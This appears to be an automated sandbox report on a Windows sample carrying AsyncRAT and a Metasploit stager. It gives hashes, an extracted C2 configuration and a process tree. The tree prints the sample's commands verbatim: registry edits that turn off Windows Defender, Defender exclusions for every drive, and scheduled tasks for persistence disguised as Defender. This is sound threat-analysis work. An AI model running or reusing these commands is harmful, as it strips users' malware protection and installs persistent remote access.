Analysis
-
max time kernel
147s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 19:14
Static task
static1
Behavioral task
behavioral1
Sample
00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
Resource
win10v2004-20250314-en
General
-
Target
00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
-
Size
13.0MB
-
MD5
66f293c1394e81b02da06a86f5bcb249
-
SHA1
ac0b8acc5eb9395d6a8a40be01a3e75a7208e23c
-
SHA256
00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22
-
SHA512
b3bd8252473e9960cdf32d3d89e6f1df3ced96621ae12d085e58705dd12803d5a3e90e1a6899545921f7f32f2bf9072fd26d147a0dd2fb4d3edc21f0a756ca1e
-
SSDEEP
393216:mtoHOLHsaSZ2pczKc1esHdZYjzGLO51D6GCoJ:NOL7mH9ZEN5h6RE
Malware Config
Extracted
asyncrat
Default
127.0.0.1:3001
108.252.227.16:3001
-
delay
1
-
install
true
-
install_file
dsg$4yt.exe
-
install_folder
%AppData%
Extracted
metasploit
metasploit_stager
0.0.0.0:3000
Signatures
-
Asyncrat family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000018780-12.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3012 powershell.exe 1632 powershell.exe 2828 powershell.exe 2992 powershell.exe 1696 powershell.exe 2292 powershell.exe 2864 powershell.exe 2608 powershell.exe 2420 powershell.exe 2752 powershell.exe 2928 powershell.exe 2196 powershell.exe 1136 powershell.exe 2176 powershell.exe 1368 powershell.exe 1332 powershell.exe 2212 powershell.exe 2376 powershell.exe 572 powershell.exe 2472 powershell.exe 1428 powershell.exe 908 powershell.exe 1028 powershell.exe 1676 powershell.exe 876 powershell.exe 2556 powershell.exe -
Executes dropped EXE 5 IoCs
pid Process 2748 HOlC2.1.exe 2940 svchost.exe 2660 HOIC.2.1.exe 1332 dsg$4yt.exe 2064 Anti Malware Service.exe -
Loads dropped DLL 4 IoCs
pid Process 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 2652 Process not Found 1812 cmd.exe 1812 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HOIC.2.1.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1172 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3004 schtasks.exe 760 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1332 powershell.exe 1632 powershell.exe 2828 powershell.exe 2212 powershell.exe 2376 powershell.exe 572 powershell.exe 2940 svchost.exe 2940 svchost.exe 2940 svchost.exe 1676 powershell.exe 2992 powershell.exe 1696 powershell.exe 2472 powershell.exe 1428 powershell.exe 876 powershell.exe 2556 powershell.exe 2752 powershell.exe 3012 powershell.exe 2864 powershell.exe 908 powershell.exe 2608 powershell.exe 2928 powershell.exe 2420 powershell.exe 2196 powershell.exe 1136 powershell.exe 1028 powershell.exe 2176 powershell.exe 1368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 2940 svchost.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1332 dsg$4yt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2748 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 30 PID 2328 wrote to memory of 2748 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 30 PID 2328 wrote to memory of 2748 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 30 PID 2328 wrote to memory of 2940 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 32 PID 2328 wrote to memory of 2940 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 32 PID 2328 wrote to memory of 2940 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 32 PID 2748 wrote to memory of 2812 2748 HOlC2.1.exe 33 PID 2748 wrote to memory of 2812 2748 HOlC2.1.exe 33 PID 2748 wrote to memory of 2812 2748 HOlC2.1.exe 33 PID 2748 wrote to memory of 2908 2748 HOlC2.1.exe 34 PID 2748 wrote to memory of 2908 2748 HOlC2.1.exe 34 PID 2748 wrote to memory of 2908 2748 HOlC2.1.exe 34 PID 2748 wrote to memory of 3064 2748 HOlC2.1.exe 35 PID 2748 wrote to memory of 3064 2748 HOlC2.1.exe 35 PID 2748 wrote to memory of 3064 2748 HOlC2.1.exe 35 PID 3064 wrote to memory of 760 3064 cmd.exe 36 PID 3064 wrote to memory of 760 3064 cmd.exe 36 PID 3064 wrote to memory of 760 3064 cmd.exe 36 PID 2328 wrote to memory of 2660 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 37 PID 2328 wrote to memory of 2660 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 37 PID 2328 wrote to memory of 2660 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 37 PID 2328 wrote to memory of 2660 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe 37 PID 2748 wrote to memory of 892 2748 HOlC2.1.exe 81 PID 2748 wrote to memory of 892 2748 HOlC2.1.exe 81 PID 2748 wrote to memory of 892 2748 HOlC2.1.exe 81 PID 892 wrote to memory of 556 892 cmd.exe 39 PID 892 wrote to memory of 556 892 cmd.exe 39 PID 892 wrote to memory of 556 892 cmd.exe 39 PID 2748 wrote to memory of 1688 2748 HOlC2.1.exe 40 PID 2748 wrote to memory of 1688 2748 HOlC2.1.exe 40 PID 2748 wrote to memory of 1688 2748 HOlC2.1.exe 40 PID 1688 wrote to memory of 2864 1688 cmd.exe 82 PID 1688 wrote to memory of 2864 1688 cmd.exe 82 PID 1688 wrote to memory of 2864 1688 cmd.exe 82 PID 2748 wrote to memory of 2916 2748 HOlC2.1.exe 42 PID 2748 wrote to memory of 2916 2748 HOlC2.1.exe 42 PID 2748 wrote to memory of 2916 2748 HOlC2.1.exe 42 PID 2916 wrote to memory of 1332 2916 cmd.exe 85 PID 2916 wrote to memory of 1332 2916 cmd.exe 85 PID 2916 wrote to memory of 1332 2916 cmd.exe 85 PID 2748 wrote to memory of 2964 2748 HOlC2.1.exe 86 PID 2748 wrote to memory of 2964 2748 HOlC2.1.exe 86 PID 2748 wrote to memory of 2964 2748 HOlC2.1.exe 86 PID 2964 wrote to memory of 1632 2964 cmd.exe 45 PID 2964 wrote to memory of 1632 2964 cmd.exe 45 PID 2964 wrote to memory of 1632 2964 cmd.exe 45 PID 2748 wrote to memory of 2336 2748 HOlC2.1.exe 88 PID 2748 wrote to memory of 2336 2748 HOlC2.1.exe 88 PID 2748 wrote to memory of 2336 2748 HOlC2.1.exe 88 PID 2336 wrote to memory of 2828 2336 cmd.exe 47 PID 2336 wrote to memory of 2828 2336 cmd.exe 47 PID 2336 wrote to memory of 2828 2336 cmd.exe 47 PID 2748 wrote to memory of 2852 2748 HOlC2.1.exe 48 PID 2748 wrote to memory of 2852 2748 HOlC2.1.exe 48 PID 2748 wrote to memory of 2852 2748 HOlC2.1.exe 48 PID 2852 wrote to memory of 2212 2852 cmd.exe 49 PID 2852 wrote to memory of 2212 2852 cmd.exe 49 PID 2852 wrote to memory of 2212 2852 cmd.exe 49 PID 2748 wrote to memory of 2196 2748 HOlC2.1.exe 93 PID 2748 wrote to memory of 2196 2748 HOlC2.1.exe 93 PID 2748 wrote to memory of 2196 2748 HOlC2.1.exe 93 PID 2196 wrote to memory of 2376 2196 cmd.exe 92 PID 2196 wrote to memory of 2376 2196 cmd.exe 92 PID 2196 wrote to memory of 2376 2196 cmd.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe"C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe"C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"3⤵PID:2812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"3⤵PID:2908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"3⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"4⤵
- Scheduled Task/Job: Scheduled Task
PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f3⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\reg.exereg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f3⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\reg.exereg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force3⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force3⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force3⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force3⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force3⤵PID:1148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force3⤵PID:1020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force3⤵PID:1816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force3⤵PID:2364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force3⤵PID:2308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force3⤵PID:2456
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force3⤵PID:1312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force3⤵PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:2292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force3⤵PID:2680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force3⤵PID:2804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force3⤵PID:2676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force3⤵PID:892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force3⤵PID:1748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force3⤵PID:2964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force3⤵PID:2336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force3⤵PID:2832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force3⤵PID:2376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force3⤵PID:3048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force3⤵PID:2988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force3⤵PID:628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force3⤵PID:1020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"3⤵
- Loads dropped DLL
PID:1812 -
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"4⤵
- Executes dropped EXE
PID:2064 -
C:\Windows\system32\rundll32.exerundll325⤵PID:1740
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"' & exit3⤵PID:2116
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:3004
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4AC6.tmp.bat""3⤵PID:944
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1172
-
-
C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe"C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2660
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.5MB
MD5451c94a23536dcbba422d7612b34b6ff
SHA10b419c8b9f60cb9cb8957a6dbccb393b5d072e43
SHA2563c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0
SHA512b777963ab9d21efa29528e6a126e616088205aff9e1b63453c731966dccf5f15cf30f17a933d40c98347a2d057b5f2cb40e40847f41476f0f212b28ce12e94de
-
Filesize
63KB
MD54ba7faa19363c41304cbdc35aa60ba56
SHA1afc806d82fae43d2427bd7b2deaf13c8473847da
SHA256e88d123cf046a30859753771d3052b1290534acca5eaec94d8d0590b86d70178
SHA5127a5fc420bac78206fe35766bd6c908879fc5e7ed88f87f2ff4ebee643a4e554ef6c94de69dec20e44024df7fc46b582dbc4744078e15d657c60f5999001ffda8
-
Filesize
151B
MD5ccca5d5a894cc9a74616e59310efa55b
SHA1bb7c6ca515417035ce2bd469f0e01f4e8a44c855
SHA2562c284efc44e8369a30c7786e7efee82be8c808c5538e794f1478dbb5b696d634
SHA512cf51e50e8fd1a57cf4162e57b4051f38d7471f8f31a6e58054a9ed81bc2d16382fadcece40a58159bbd980d9cff92ae5ca8c5888ba6fac2dd58d6e95f290b1d4
-
Filesize
900KB
MD53c5edd9bbe4c8fccc43b1849128d4fbc
SHA1e046251308e1dc9b7722b1d32f8bc9593d7c1dc9
SHA25664b38f64129aa45c3b5aa5bd87a682814adec425326603565c0c1d013fdb4cc1
SHA512de3ce4e2f9e689bc7d8b06682f974502d63772e097aa76caa8f83ef961e168b10371f0c1f8e0645005c24162e7fcd7a69f31a4eabc9564d1a50df11ec092cc14
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e0f4d3f5daf91fb448ac9f2ebde15da0
SHA1c1899add3579a6f0ce82696e556478891926cf4f
SHA256f27d10ef7ea1b43c88f6b77bb3b2307c75cbdbb3ce48d5edfcddc968b2d35817
SHA512fbb9aee71c249d88a68f280db8f8dee3ee4aed436e5a9cb15c4d7fdf8ed4120f93f0db2143c0429ff25f5ba0a3e1b4a96910e2f8f8bd367c4d9011945d0a09a6
-
Filesize
4.4MB
MD5a2b98f2c39c4ee63db62e17f1922543b
SHA174ec3e0bd346f66124e31a88342fdb7360795373
SHA2564ffa5259e2480cedc72cb451274b99839415980f79cc8aa00c732e8e3422e900
SHA51254cb755cd150d0dc49ec5023a2be3e1a851300c9d90fe7eb9beca1fecdaf17c31a5a85f4662c0600cc690292b98e078df4295c56d733ee40911bafaf580f13f5